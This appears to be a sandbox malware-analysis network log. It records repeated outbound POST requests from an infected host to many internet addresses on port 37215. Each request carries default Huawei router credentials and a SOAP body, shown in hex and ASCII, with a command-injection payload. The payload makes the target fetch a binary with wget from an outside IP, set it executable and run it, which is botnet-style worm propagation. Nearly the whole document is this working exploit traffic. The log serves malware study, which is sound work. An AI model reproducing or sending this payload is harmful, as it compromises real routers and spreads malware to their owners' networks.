                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2466192.168.2.154457237.99.23.11737215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.478122950 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2467192.168.2.1532908181.109.86.21137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.478138924 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2468192.168.2.1541914181.28.165.23337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.478184938 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2469192.168.2.153986041.163.108.6237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.478220940 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2470192.168.2.1559326197.44.139.17837215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.478616953 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2471192.168.2.1553606190.190.198.4237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.478630066 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2472192.168.2.155645694.36.159.9437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.478688002 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2473192.168.2.1550760222.169.24.10237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.478698969 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2474192.168.2.1536024197.15.25.2937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.478723049 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2475192.168.2.154663894.147.9.11037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.478826046 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
